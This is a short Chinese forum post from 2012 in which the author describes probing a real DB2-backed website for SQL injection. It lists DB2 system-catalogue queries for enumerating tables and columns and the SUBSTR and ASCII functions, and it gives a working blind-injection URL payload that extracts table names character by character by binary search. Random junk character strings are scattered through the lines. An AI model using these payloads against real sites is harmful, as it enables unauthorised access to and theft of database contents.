使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 % ~5 h% s7 H* L3 U: l* B( l: T
参考了IBM DB2的文档,总结了这样几条: 8 }9 @8 \- T$ H4 `8 Z* ~
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
) k5 V6 ?) O1 I可以返回系统中所有用户创建的表(table)名 * a. ^0 E, S8 `
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' : Z; p4 q0 |/ C+ P B- l
返回表中的列名
4 |& S, J$ F$ x3 d' b3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY ! ^+ E7 m; k& X/ b3 R6 K/ E
这是最关键的地方,返回第一条记录,类似于sql server中的top 1 . J7 y+ c5 t! ~5 x
4、SUBSTR(string, position, length)
, Q$ k$ S( W/ V( n返回字符串子串的函数,类似于mid 2 C7 Q( ]6 e/ \: Q
5、ASCII()这个就不用多说了。 9 k8 J6 s8 H& V
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
2 |/ D T5 ^0 z例如判断第一个table的名称的第一个字符的ascii码是否大于50: . D' ?) P5 ^, u! }
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
1 k- d+ s$ i; f) e7 V1 p# ^6 B# U
: r/ T8 N2 n1 ohttp://blog.waynedeng.com/blogview.asp?logID=543
+ W3 D. k' v; M. m" o* i |
发表于 2012-9-15 14:06:51
收藏
支持
反对